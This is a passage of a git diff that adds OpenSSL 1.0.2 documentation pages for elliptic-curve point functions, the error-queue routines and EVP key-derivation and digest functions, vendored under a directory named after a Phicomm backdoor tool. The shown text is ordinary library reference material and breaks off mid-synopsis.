+ void EC_POINT_free(EC_POINT *point);
+ void EC_POINT_clear_free(EC_POINT *point);
+ int EC_POINT_copy(EC_POINT *dst, const EC_POINT *src);
+ EC_POINT *EC_POINT_dup(const EC_POINT *src, const EC_GROUP *group);
+ const EC_METHOD *EC_POINT_method_of(const EC_POINT *point);
+ int EC_POINT_set_to_infinity(const EC_GROUP *group, EC_POINT *point);
+ int EC_POINT_set_Jprojective_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, const BIGNUM *y, const BIGNUM *z, BN_CTX *ctx);
+ int EC_POINT_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
+	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BIGNUM *z, BN_CTX *ctx);
+ int EC_POINT_set_affine_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_get_affine_coordinates_GFp(const EC_GROUP *group,
+	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_set_compressed_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, int y_bit, BN_CTX *ctx);
+ int EC_POINT_set_affine_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_get_affine_coordinates_GF2m(const EC_GROUP *group,
+	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_set_compressed_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, int y_bit, BN_CTX *ctx);
+ size_t EC_POINT_point2oct(const EC_GROUP *group, const EC_POINT *p,
+	point_conversion_form_t form,
+        unsigned char *buf, size_t len, BN_CTX *ctx);
+ int EC_POINT_oct2point(const EC_GROUP *group, EC_POINT *p,
+        const unsigned char *buf, size_t len, BN_CTX *ctx);
+ BIGNUM *EC_POINT_point2bn(const EC_GROUP *, const EC_POINT *,
+	point_conversion_form_t form, BIGNUM *, BN_CTX *);
+ EC_POINT *EC_POINT_bn2point(const EC_GROUP *, const BIGNUM *,
+	EC_POINT *, BN_CTX *);
+ char *EC_POINT_point2hex(const EC_GROUP *, const EC_POINT *,
+	point_conversion_form_t form, BN_CTX *);
+ EC_POINT *EC_POINT_hex2point(const EC_GROUP *, const char *,
+	EC_POINT *, BN_CTX *);
+
+
+=head1 DESCRIPTION
+
+An EC_POINT represents a point on a curve. A new point is constructed by calling the function EC_POINT_new and providing the B<group>
+object that the point relates to.
+
+EC_POINT_free frees the memory associated with the EC_POINT.
+
+EC_POINT_clear_free destroys any sensitive data held within the EC_POINT and then frees its memory.
+
+EC_POINT_copy copies the point B<src> into B<dst>. Both B<src> and B<dst> must use the same EC_METHOD.
+
+EC_POINT_dup creates a new EC_POINT object and copies the content from B<src> to the newly created
+EC_POINT object.
+
+EC_POINT_method_of obtains the EC_METHOD associated with B<point>.
+
+A valid point on a curve is the special point at  infinity. A point is set to be at infinity by calling EC_POINT_set_to_infinity.
+
+The affine co-ordinates for a point describe a point in terms of its x and y position. The functions
+EC_POINT_set_affine_coordinates_GFp and EC_POINT_set_affine_coordinates_GF2m set the B<x> and B<y> co-ordinates for the point
+B<p> defined over the curve given in B<group>.
+
+As well as the affine co-ordinates, a point can alternatively be described in terms of its Jacobian
+projective co-ordinates (for Fp curves only). Jacobian projective co-ordinates are expressed as three values x, y and z. Working in
+this co-ordinate system provides more efficient point multiplication operations.
+A mapping exists between Jacobian projective co-ordinates and affine co-ordinates. A Jacobian projective co-ordinate (x, y, z) can be written as an affine co-ordinate as (x/(z^2), y/(z^3)). Conversion to Jacobian projective to affine co-ordinates is simple. The co-ordinate (x, y) is
+mapped to (x, y, 1). To set or get the projective co-ordinates use EC_POINT_set_Jprojective_coordinates_GFp and
+EC_POINT_get_Jprojective_coordinates_GFp respectively.
+
+Points can also be described in terms of their compressed co-ordinates. For a point (x, y), for any given value for x such that the point is
+on the curve there will only ever be two possible values for y. Therefore a point can be set using the EC_POINT_set_compressed_coordinates_GFp
+and EC_POINT_set_compressed_coordinates_GF2m functions where B<x> is the x co-ordinate and B<y_bit> is a value 0 or 1 to identify which of
+the two possible values for y should be used.
+
+In addition EC_POINTs can be converted to and from various external representations. Supported representations are octet strings, BIGNUMs and hexadecimal. The format of the external representation is described by the point_conversion_form. See L<EC_GROUP_copy(3)|EC_GROUP_copy(3)> for
+a description of point_conversion_form. Octet strings are stored in a buffer along with an associated buffer length. A point held in a BIGNUM is calculated by converting the point to an octet string and then converting that octet string into a BIGNUM integer. Points in hexadecimal format are stored in a NULL terminated character string where each character is one of the printable values 0-9 or A-F (or a-f).
+
+The functions EC_POINT_point2oct, EC_POINT_oct2point, EC_POINT_point2bn, EC_POINT_bn2point, EC_POINT_point2hex and EC_POINT_hex2point convert
+from and to EC_POINTs for the formats: octet string, BIGNUM and hexadecimal respectively.
+
+The function EC_POINT_point2oct must be supplied with a buffer long enough to store the octet string. The return value provides the number of
+octets stored. Calling the function with a NULL buffer will not perform the conversion but will still return the required buffer length.
+
+The function EC_POINT_point2hex will allocate sufficient memory to store the hexadecimal string. It is the caller's responsibility to free
+this memory with a subsequent call to OPENSSL_free().
+
+=head1 RETURN VALUES
+
+EC_POINT_new and EC_POINT_dup return the newly allocated EC_POINT or NULL on error.
+
+The following functions return 1 on success or 0 on error: EC_POINT_copy, EC_POINT_set_to_infinity, EC_POINT_set_Jprojective_coordinates_GFp,
+EC_POINT_get_Jprojective_coordinates_GFp, EC_POINT_set_affine_coordinates_GFp, EC_POINT_get_affine_coordinates_GFp,
+EC_POINT_set_compressed_coordinates_GFp, EC_POINT_set_affine_coordinates_GF2m, EC_POINT_get_affine_coordinates_GF2m,
+EC_POINT_set_compressed_coordinates_GF2m and EC_POINT_oct2point.
+
+EC_POINT_method_of returns the EC_METHOD associated with the supplied EC_POINT.
+
+EC_POINT_point2oct returns the length of the required buffer, or 0 on error.
+
+EC_POINT_point2bn returns the pointer to the BIGNUM supplied, or NULL on error.
+
+EC_POINT_bn2point returns the pointer to the EC_POINT supplied, or NULL on error.
+
+EC_POINT_point2hex returns a pointer to the hex string, or NULL on error.
+
+EC_POINT_hex2point returns the pointer to the EC_POINT supplied, or NULL on error.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_add(3)|EC_POINT_add(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_GET_LIB.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_GET_LIB.pod
new file mode 100644
index 0000000..2a129da
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_GET_LIB.pod
@@ -0,0 +1,51 @@
+=pod
+
+=head1 NAME
+
+ERR_GET_LIB, ERR_GET_FUNC, ERR_GET_REASON - get library, function and
+reason code
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ int ERR_GET_LIB(unsigned long e);
+
+ int ERR_GET_FUNC(unsigned long e);
+
+ int ERR_GET_REASON(unsigned long e);
+
+=head1 DESCRIPTION
+
+The error code returned by ERR_get_error() consists of a library
+number, function code and reason code. ERR_GET_LIB(), ERR_GET_FUNC()
+and ERR_GET_REASON() can be used to extract these.
+
+The library number and function code describe where the error
+occurred, the reason code is the information about what went wrong.
+
+Each sub-library of OpenSSL has a unique library number; function and
+reason codes are unique within each sub-library.  Note that different
+libraries may use the same value to signal different functions and
+reasons.
+
+B<ERR_R_...> reason codes such as B<ERR_R_MALLOC_FAILURE> are globally
+unique. However, when checking for sub-library specific reason codes,
+be sure to also compare the library number.
+
+ERR_GET_LIB(), ERR_GET_FUNC() and ERR_GET_REASON() are macros.
+
+=head1 RETURN VALUES
+
+The library number, function code and reason code respectively.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+ERR_GET_LIB(), ERR_GET_FUNC() and ERR_GET_REASON() are available in
+all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_clear_error.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_clear_error.pod
new file mode 100644
index 0000000..566e1f4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_clear_error.pod
@@ -0,0 +1,29 @@
+=pod
+
+=head1 NAME
+
+ERR_clear_error - clear the error queue
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ void ERR_clear_error(void);
+
+=head1 DESCRIPTION
+
+ERR_clear_error() empties the current thread's error queue.
+
+=head1 RETURN VALUES
+
+ERR_clear_error() has no return value.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+ERR_clear_error() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_error_string.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_error_string.pod
new file mode 100644
index 0000000..cdfa7fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_error_string.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+ERR_error_string, ERR_error_string_n, ERR_lib_error_string,
+ERR_func_error_string, ERR_reason_error_string - obtain human-readable
+error message
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ char *ERR_error_string(unsigned long e, char *buf);
+ void ERR_error_string_n(unsigned long e, char *buf, size_t len);
+
+ const char *ERR_lib_error_string(unsigned long e);
+ const char *ERR_func_error_string(unsigned long e);
+ const char *ERR_reason_error_string(unsigned long e);
+
+=head1 DESCRIPTION
+
+ERR_error_string() generates a human-readable string representing the
+error code I<e>, and places it at I<buf>. I<buf> must be at least 120
+bytes long. If I<buf> is B<NULL>, the error string is placed in a
+static buffer.
+ERR_error_string_n() is a variant of ERR_error_string() that writes
+at most I<len> characters (including the terminating 0)
+and truncates the string if necessary.
+For ERR_error_string_n(), I<buf> may not be B<NULL>.
+
+The string will have the following format:
+
+ error:[error code]:[library name]:[function name]:[reason string]
+
+I<error code> is an 8 digit hexadecimal number, I<library name>,
+I<function name> and I<reason string> are ASCII text.
+
+ERR_lib_error_string(), ERR_func_error_string() and
+ERR_reason_error_string() return the library name, function
+name and reason string respectively.
+
+The OpenSSL error strings should be loaded by calling
+L<ERR_load_crypto_strings(3)|ERR_load_crypto_strings(3)> or, for SSL
+applications, L<SSL_load_error_strings(3)|SSL_load_error_strings(3)>
+first.
+If there is no text string registered for the given error code,
+the error string will contain the numeric code.
+
+L<ERR_print_errors(3)|ERR_print_errors(3)> can be used to print
+all error codes currently in the queue.
+
+=head1 RETURN VALUES
+
+ERR_error_string() returns a pointer to a static buffer containing the
+string if I<buf> B<== NULL>, I<buf> otherwise.
+
+ERR_lib_error_string(), ERR_func_error_string() and
+ERR_reason_error_string() return the strings, and B<NULL> if
+none is registered for the error code.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_get_error(3)|ERR_get_error(3)>,
+L<ERR_load_crypto_strings(3)|ERR_load_crypto_strings(3)>,
+L<SSL_load_error_strings(3)|SSL_load_error_strings(3)>
+L<ERR_print_errors(3)|ERR_print_errors(3)>
+
+=head1 HISTORY
+
+ERR_error_string() is available in all versions of SSLeay and OpenSSL.
+ERR_error_string_n() was added in OpenSSL 0.9.6.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_get_error.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_get_error.pod
new file mode 100644
index 0000000..01e196c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_get_error.pod
@@ -0,0 +1,79 @@
+=pod
+
+=head1 NAME
+
+ERR_get_error, ERR_peek_error, ERR_peek_last_error,
+ERR_get_error_line, ERR_peek_error_line, ERR_peek_last_error_line,
+ERR_get_error_line_data, ERR_peek_error_line_data,
+ERR_peek_last_error_line_data - obtain error code and data
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ unsigned long ERR_get_error(void);
+ unsigned long ERR_peek_error(void);
+ unsigned long ERR_peek_last_error(void);
+
+ unsigned long ERR_get_error_line(const char **file, int *line);
+ unsigned long ERR_peek_error_line(const char **file, int *line);
+ unsigned long ERR_peek_last_error_line(const char **file, int *line);
+
+ unsigned long ERR_get_error_line_data(const char **file, int *line,
+         const char **data, int *flags);
+ unsigned long ERR_peek_error_line_data(const char **file, int *line,
+         const char **data, int *flags);
+ unsigned long ERR_peek_last_error_line_data(const char **file, int *line,
+         const char **data, int *flags);
+
+=head1 DESCRIPTION
+
+ERR_get_error() returns the earliest error code from the thread's error
+queue and removes the entry. This function can be called repeatedly
+until there are no more error codes to return.
+
+ERR_peek_error() returns the earliest error code from the thread's
+error queue without modifying it.
+
+ERR_peek_last_error() returns the latest error code from the thread's
+error queue without modifying it.
+
+See L<ERR_GET_LIB(3)|ERR_GET_LIB(3)> for obtaining information about
+location and reason of the error, and
+L<ERR_error_string(3)|ERR_error_string(3)> for human-readable error
+messages.
+
+ERR_get_error_line(), ERR_peek_error_line() and
+ERR_peek_last_error_line() are the same as the above, but they
+additionally store the file name and line number where
+the error occurred in *B<file> and *B<line>, unless these are B<NULL>.
+
+ERR_get_error_line_data(), ERR_peek_error_line_data() and
+ERR_peek_last_error_line_data() store additional data and flags
+associated with the error code in *B<data>
+and *B<flags>, unless these are B<NULL>. *B<data> contains a string
+if *B<flags>&B<ERR_TXT_STRING> is true.
+
+An application B<MUST NOT> free the *B<data> pointer (or any other pointers
+returned by these functions) with OPENSSL_free() as freeing is handled
+automatically by the error library.
+
+=head1 RETURN VALUES
+
+The error code, or 0 if there is no error in the queue.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_error_string(3)|ERR_error_string(3)>,
+L<ERR_GET_LIB(3)|ERR_GET_LIB(3)>
+
+=head1 HISTORY
+
+ERR_get_error(), ERR_peek_error(), ERR_get_error_line() and
+ERR_peek_error_line() are available in all versions of SSLeay and
+OpenSSL. ERR_get_error_line_data() and ERR_peek_error_line_data()
+were added in SSLeay 0.9.0.
+ERR_peek_last_error(), ERR_peek_last_error_line() and
+ERR_peek_last_error_line_data() were added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_load_crypto_strings.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_load_crypto_strings.pod
new file mode 100644
index 0000000..9bdec75
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_load_crypto_strings.pod
@@ -0,0 +1,46 @@
+=pod
+
+=head1 NAME
+
+ERR_load_crypto_strings, SSL_load_error_strings, ERR_free_strings -
+load and free error strings
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ void ERR_load_crypto_strings(void);
+ void ERR_free_strings(void);
+
+ #include <openssl/ssl.h>
+
+ void SSL_load_error_strings(void);
+
+=head1 DESCRIPTION
+
+ERR_load_crypto_strings() registers the error strings for all
+B<libcrypto> functions. SSL_load_error_strings() does the same,
+but also registers the B<libssl> error strings.
+
+One of these functions should be called before generating
+textual error messages. However, this is not required when memory
+usage is an issue.
+
+ERR_free_strings() frees all previously loaded error strings.
+
+=head1 RETURN VALUES
+
+ERR_load_crypto_strings(), SSL_load_error_strings() and
+ERR_free_strings() return no values.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_error_string(3)|ERR_error_string(3)>
+
+=head1 HISTORY
+
+ERR_load_error_strings(), SSL_load_error_strings() and
+ERR_free_strings() are available in all versions of SSLeay and
+OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_load_strings.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_load_strings.pod
new file mode 100644
index 0000000..5acdd0e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_load_strings.pod
@@ -0,0 +1,54 @@
+=pod
+
+=head1 NAME
+
+ERR_load_strings, ERR_PACK, ERR_get_next_error_library - load
+arbitrary error strings
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ void ERR_load_strings(int lib, ERR_STRING_DATA str[]);
+
+ int ERR_get_next_error_library(void);
+
+ unsigned long ERR_PACK(int lib, int func, int reason);
+
+=head1 DESCRIPTION
+
+ERR_load_strings() registers error strings for library number B<lib>.
+
+B<str> is an array of error string data:
+
+ typedef struct ERR_string_data_st
+ {
+        unsigned long error;
+        char *string;
+ } ERR_STRING_DATA;
+
+The error code is generated from the library number and a function and
+reason code: B<error> = ERR_PACK(B<lib>, B<func>, B<reason>).
+ERR_PACK() is a macro.
+
+The last entry in the array is {0,0}.
+
+ERR_get_next_error_library() can be used to assign library numbers
+to user libraries at runtime.
+
+=head1 RETURN VALUE
+
+ERR_load_strings() returns no value. ERR_PACK() return the error code.
+ERR_get_next_error_library() returns a new library number.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_load_strings(3)|ERR_load_strings(3)>
+
+=head1 HISTORY
+
+ERR_load_error_strings() and ERR_PACK() are available in all versions
+of SSLeay and OpenSSL. ERR_get_next_error_library() was added in
+SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_print_errors.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_print_errors.pod
new file mode 100644
index 0000000..b100a5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_print_errors.pod
@@ -0,0 +1,51 @@
+=pod
+
+=head1 NAME
+
+ERR_print_errors, ERR_print_errors_fp - print error messages
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ void ERR_print_errors(BIO *bp);
+ void ERR_print_errors_fp(FILE *fp);
+
+=head1 DESCRIPTION
+
+ERR_print_errors() is a convenience function that prints the error
+strings for all errors that OpenSSL has recorded to B<bp>, thus
+emptying the error queue.
+
+ERR_print_errors_fp() is the same, except that the output goes to a
+B<FILE>.
+
+
+The error strings will have the following format:
+
+ [pid]:error:[error code]:[library name]:[function name]:[reason string]:[file name]:[line]:[optional text message]
+
+I<error code> is an 8 digit hexadecimal number. I<library name>,
+I<function name> and I<reason string> are ASCII text, as is I<optional
+text message> if one was set for the respective error code.
+
+If there is no text string registered for the given error code,
+the error string will contain the numeric code.
+
+=head1 RETURN VALUES
+
+ERR_print_errors() and ERR_print_errors_fp() return no values.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_error_string(3)|ERR_error_string(3)>,
+L<ERR_get_error(3)|ERR_get_error(3)>,
+L<ERR_load_crypto_strings(3)|ERR_load_crypto_strings(3)>,
+L<SSL_load_error_strings(3)|SSL_load_error_strings(3)>
+
+=head1 HISTORY
+
+ERR_print_errors() and ERR_print_errors_fp()
+are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_put_error.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_put_error.pod
new file mode 100644
index 0000000..acd241f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_put_error.pod
@@ -0,0 +1,44 @@
+=pod
+
+=head1 NAME
+
+ERR_put_error, ERR_add_error_data - record an error
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ void ERR_put_error(int lib, int func, int reason, const char *file,
+         int line);
+
+ void ERR_add_error_data(int num, ...);
+
+=head1 DESCRIPTION
+
+ERR_put_error() adds an error code to the thread's error queue. It
+signals that the error of reason code B<reason> occurred in function
+B<func> of library B<lib>, in line number B<line> of B<file>.
+This function is usually called by a macro.
+
+ERR_add_error_data() associates the concatenation of its B<num> string
+arguments with the error code added last.
+
+L<ERR_load_strings(3)|ERR_load_strings(3)> can be used to register
+error strings so that the application can a generate human-readable
+error messages for the error code.
+
+=head1 RETURN VALUES
+
+ERR_put_error() and ERR_add_error_data() return
+no values.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>, L<ERR_load_strings(3)|ERR_load_strings(3)>
+
+=head1 HISTORY
+
+ERR_put_error() is available in all versions of SSLeay and OpenSSL.
+ERR_add_error_data() was added in SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_remove_state.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_remove_state.pod
new file mode 100644
index 0000000..a4d38c1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_remove_state.pod
@@ -0,0 +1,45 @@
+=pod
+
+=head1 NAME
+
+ERR_remove_thread_state, ERR_remove_state - free a thread's error queue
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ void ERR_remove_thread_state(const CRYPTO_THREADID *tid);
+
+Deprecated:
+
+ void ERR_remove_state(unsigned long pid);
+
+=head1 DESCRIPTION
+
+ERR_remove_thread_state() frees the error queue associated with thread B<tid>.
+If B<tid> == B<NULL>, the current thread will have its error queue removed.
+
+Since error queue data structures are allocated automatically for new
+threads, they must be freed when threads are terminated in order to
+avoid memory leaks.
+
+ERR_remove_state is deprecated and has been replaced by
+ERR_remove_thread_state. Since threads in OpenSSL are no longer identified
+by unsigned long values any argument to this function is ignored. Calling
+ERR_remove_state is equivalent to B<ERR_remove_thread_state(NULL)>.
+
+=head1 RETURN VALUE
+
+ERR_remove_thread_state and ERR_remove_state() return no value.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>
+
+=head1 HISTORY
+
+ERR_remove_state() is available in all versions of SSLeay and OpenSSL. It
+was deprecated in OpenSSL 1.0.0 when ERR_remove_thread_state was introduced
+and thread IDs were introduced to identify threads instead of 'unsigned long'. 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_set_mark.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_set_mark.pod
new file mode 100644
index 0000000..d3ca4f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ERR_set_mark.pod
@@ -0,0 +1,38 @@
+=pod
+
+=head1 NAME
+
+ERR_set_mark, ERR_pop_to_mark - set marks and pop errors until mark
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ int ERR_set_mark(void);
+
+ int ERR_pop_to_mark(void);
+
+=head1 DESCRIPTION
+
+ERR_set_mark() sets a mark on the current topmost error record if there
+is one.
+
+ERR_pop_to_mark() will pop the top of the error stack until a mark is found.
+The mark is then removed.  If there is no mark, the whole stack is removed.
+
+=head1 RETURN VALUES
+
+ERR_set_mark() returns 0 if the error stack is empty, otherwise 1.
+
+ERR_pop_to_mark() returns 0 if there was no mark in the error stack, which
+implies that the stack became empty, otherwise 1.
+
+=head1 SEE ALSO
+
+L<err(3)|err(3)>
+
+=head1 HISTORY
+
+ERR_set_mark() and ERR_pop_to_mark() were added in OpenSSL 0.9.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_BytesToKey.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_BytesToKey.pod
new file mode 100644
index 0000000..5d60595
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_BytesToKey.pod
@@ -0,0 +1,70 @@
+=pod
+
+=head1 NAME
+
+EVP_BytesToKey - password based encryption routine
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_BytesToKey(const EVP_CIPHER *type,const EVP_MD *md,
+                       const unsigned char *salt,
+                       const unsigned char *data, int datal, int count,
+                       unsigned char *key,unsigned char *iv);
+
+=head1 DESCRIPTION
+
+EVP_BytesToKey() derives a key and IV from various parameters. B<type> is
+the cipher to derive the key and IV for. B<md> is the message digest to use.
+The B<salt> parameter is used as a salt in the derivation: it should point to
+an 8 byte buffer or NULL if no salt is used. B<data> is a buffer containing
+B<datal> bytes which is used to derive the keying data. B<count> is the
+iteration count to use. The derived key and IV will be written to B<key>
+and B<iv> respectively.
+
+=head1 NOTES
+
+A typical application of this function is to derive keying material for an
+encryption algorithm from a password in the B<data> parameter.
+
+Increasing the B<count> parameter slows down the algorithm which makes it
+harder for an attacker to peform a brute force attack using a large number
+of candidate passwords.
+
+If the total key and IV length is less than the digest length and
+B<MD5> is used then the derivation algorithm is compatible with PKCS#5 v1.5
+otherwise a non standard extension is used to derive the extra data.
+
+Newer applications should use more standard algorithms such as PBKDF2 as
+defined in PKCS#5v2.1 for key derivation.
+
+=head1 KEY DERIVATION ALGORITHM
+
+The key and IV is derived by concatenating D_1, D_2, etc until
+enough data is available for the key and IV. D_i is defined as:
+
+	D_i = HASH^count(D_(i-1) || data || salt)
+
+where || denotes concatentaion, D_0 is empty, HASH is the digest
+algorithm in use, HASH^1(data) is simply HASH(data), HASH^2(data)
+is HASH(HASH(data)) and so on.
+
+The initial bytes are used for the key and the subsequent bytes for
+the IV.
+
+=head1 RETURN VALUES
+
+If B<data> is NULL, then EVP_BytesToKey() returns the number of bytes
+needed to store the derived key.
+Otherwise, EVP_BytesToKey() returns the size of the derived key in bytes,
+or 0 on error.
+
+=head1 SEE ALSO
+
+L<evp(3)|evp(3)>, L<rand(3)|rand(3)>,
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)>
+
+=head1 HISTORY
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestInit.pod
new file mode 100644
index 0000000..0895e8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestInit.pod
@@ -0,0 +1,282 @@
+=pod
+
+=head1 NAME
+
+EVP_MD_CTX_init, EVP_MD_CTX_create, EVP_DigestInit_ex, EVP_DigestUpdate,
+EVP_DigestFinal_ex, EVP_MD_CTX_cleanup, EVP_MD_CTX_destroy, EVP_MAX_MD_SIZE,
+EVP_MD_CTX_copy_ex, EVP_DigestInit, EVP_DigestFinal, EVP_MD_CTX_copy, EVP_MD_type,
+EVP_MD_pkey_type, EVP_MD_size, EVP_MD_block_size, EVP_MD_CTX_md, EVP_MD_CTX_size,
+EVP_MD_CTX_block_size, EVP_MD_CTX_type, EVP_md_null, EVP_md2, EVP_md5, EVP_sha, EVP_sha1,
+EVP_sha224, EVP_sha256, EVP_sha384, EVP_sha512, EVP_dss, EVP_dss1, EVP_mdc2,
+EVP_ripemd160, EVP_get_digestbyname, EVP_get_digestbynid, EVP_get_digestbyobj -
+EVP digest routines
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ void EVP_MD_CTX_init(EVP_MD_CTX *ctx);
+ EVP_MD_CTX *EVP_MD_CTX_create(void);
+
+ int EVP_DigestInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl);
+ int EVP_DigestUpdate(EVP_MD_CTX *ctx, const void *d, size_t cnt);
+ int EVP_DigestFinal_ex(EVP_MD_CTX *ctx, unsigned char *md,
+        unsigned int *s);
+
+ int EVP_MD_CTX_cleanup(EVP_MD_CTX *ctx);
+ void EVP_MD_CTX_destroy(EVP_MD_CTX *ctx);
+
+ int EVP_MD_CTX_copy_ex(EVP_MD_CTX *out,const EVP_MD_CTX *in);
+
+ int EVP_DigestInit(EVP_MD_CTX *ctx, const EVP_MD *type);
+ int EVP_DigestFinal(EVP_MD_CTX *ctx, unsigned char *md,
+        unsigned int *s);
+
+ int EVP_MD_CTX_copy(EVP_MD_CTX *out,EVP_MD_CTX *in);
+
+ #define EVP_MAX_MD_SIZE 64	/* SHA512 */
+
+ int EVP_MD_type(const EVP_MD *md);
+ int EVP_MD_pkey_type(const EVP_MD *md);	
+ int EVP_MD_size(const EVP_MD *md);
+ int EVP_MD_block_size(const EVP_MD *md);
+
+ const EVP_MD *EVP_MD_CTX_md(const EVP_MD_CTX *ctx);
+ #define EVP_MD_CTX_size(e)		EVP_MD_size(EVP_MD_CTX_md(e))
+ #define EVP_MD_CTX_block_size(e)	EVP_MD_block_size((e)->digest)
